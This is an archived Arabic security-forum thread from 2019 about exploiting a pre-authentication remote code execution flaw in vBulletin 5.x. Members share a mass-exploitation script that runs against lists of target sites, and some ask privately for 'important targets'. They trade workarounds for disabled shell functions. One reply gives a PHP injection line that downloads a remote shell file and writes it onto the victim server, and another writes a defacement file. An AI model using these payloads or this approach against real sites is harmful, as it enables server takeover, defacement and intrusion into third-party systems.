الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم الأخبار التقنية والنقاشات الجادة (https://www.sec4ever.com/home/forumdisplay.php?f=98)
-   -   [شرح بالصور] vBulletin 5.x 0day pre-auth RCE exploit (https://www.sec4ever.com/home/showthread.php?t=19645)

alzher 24-09-2019 08:27 PM

vBulletin 5.x 0day pre-auth RCE exploit
 
1 مرفق
السلام عليكم ورحمه الله وبركاته ..

/

ثغره طازجه من الفرن بتاريخ 23/9/2019

/

https://seclists.org/fulldisclosure/2019/Sep/31

/

تطبيق الثغره من الجوال (termux)


https://www.sec4ever.com/home/attach...1&d=1569352981


/

الاستثمار يحتاج الى تعديل في حالة منع دالة shell_exec على الهدف المطلوب

/

في امان الله

Dr.Mohamed 25-09-2019 10:18 AM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
كش اهداف مهمة متنسانيش على الخاص



ثغرة هذي تفكرني في نطاق ليبيا ههههههه

mario-ma 25-09-2019 12:59 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
السلام عليكم



بيطع كتير



vBulletin$ id
{"template":"","css_links":[]}




شنو الحل

Cwne 25-09-2019 05:03 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
1 مرفق
وعليكم السلام ورحمة الله وبركاته.


كما تعلم اخي فالثغرة خطيرة، ولكنها كما تعودنا، تقع في ايدي اطفال الاختراق، ويبدأو بإختراق مواقع المسلمين، وحسبنا الله ونعم الوكيل، مع انه والله لو ركز ذلك الشخص في اهدافه، لحصل على شيء لم يكن ليحلم به.


ولتطوير الموضوع بالمزيد من المحتوى، في المرفقات ملف يشابه الملف المطروح مكتوب بالPHP ولكنه يعمل على عدة اهداف بنفس الامر.
قم بوضع المواقع في ملف file_name.txt وقم بتشغيله، والنتيجة هي كل موقع بجانبه نتيجة الاستغلال.


وإني اشهد الله العلي العظيم انني ابرأ إلي الله من اي شخص يستخدم هذه الاسطر في الضرر بالمسلمين.

ونسأل الله العلي العظيم ان يوفقكم اجمعين.

MA DANGER 26-09-2019 01:19 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
هناك من برمج Botnet لإستغلال المواقع المصابة ومنع تطبيق الاوامر على السيرفر عبر إضافة باسوورد للملف المصاب حتى يحظى بالغنيمة لوحده ddd


https://www.bleepingcomputer.com/new...other-hackers/

MA DANGER 27-09-2019 01:24 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
اقتباس:

المشاركة الأصلية كتبت بواسطة DamaneDz (المشاركة 104062)
برمجت أداة للاستعمال السريع

يرجى عدم استعمالها في مضرة المسلمين و أي استعمال غير قانوني لا أتحمل مسؤوليته

الأداة نشرتها لأغراض الحماية و سيتم نشر السورس بعد التأكد من عدم وجود مشاكل في الاستغلال

الأداة بها 4 خاصيات

الخاصية الأولي جلب اصدار vBulletin

الخاصية الثانية خاصة بتطبيق أوامر عن طريق دالة shell_exec

الخاصية الثالثة جلب معلومات الكونفيق

الخاصية الرابعة رفع شل في الموقع (الخاصية لا تعمل معظم الأحيان)

الأداة لا تخلو من المشاكل بعد لذا يرجى مشاركة المشاكل التي واجهتكم حتى تصبح أفضل !


https://image.prntscr.com/image/4g4v...HKtUe79o4A.png




أضف دوال أخرى لتطبيق الأوامر في حالة ما إذا كانت دالة shell_exec لا تعمل ..


بالنسبة للخاصية الثالثة لم تعمل على الموقع الذي جربته ، هل تستعمل دالة file_get_contents ؟

Dr.Mohamed 27-09-2019 02:11 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
تم حذف الرابط فوق يرجي من العضو وضع السكربت كرد او في موضوع منفصل
وسيتم تحديث القانون بهذا الخصوص

#الادارة

MA DANGER 27-09-2019 04:45 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
واجهت مشاكل مع احد الاهداف حيث ان اغلب دوال تطبيق الاوامر غير مفعلة فقمت بتعديل بسيط لرفع ملف عن طريق file_get_contents و file_put_contents .....



https://pastebin.com/ymeyrtYH


هنا ايضا ملف بسيط لتطبيق الاوامر عن طريق دالة proc_open



https://pastebin.com/raw/nCNNLLb7

Dr.Mohamed 27-09-2019 07:18 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
الفكرة انك تبد ب phpinfo و تقوم بالتخطي


البعض فقط تعود على الويب وانا افضل استخدام cli لانه بعض الاحيان لاتجد ملف مصرح ويجب حينها رفع ملفاتك على tmp وتشغيلها من هناك


اهم شي في القصة الثغرة code injection وانت احقن وشوف نتيجة الحقن


سلام

x0Slotleet 27-09-2019 08:28 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
الثغرة موجودة من ثلاث سنوات، وتباع بالسوق السوداء ...

Dr.5RaB 28-09-2019 06:22 AM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
من ناحية تطوير الإستغلال



اقتباس:

$file='q8.txt'; $text='hacker is here'; file_put_contents($file,$text);


Dr.5RaB 29-09-2019 01:12 AM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:

  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ

Dr1337 01-10-2019 09:31 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
اقتباس:

المشاركة الأصلية كتبت بواسطة dr.5rab (المشاركة 104072)
عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:

  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ

كيف نقدر نتواصل معك لو سمحت


الساعة الآن 12:30 AM

Powered by vBulletin® Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.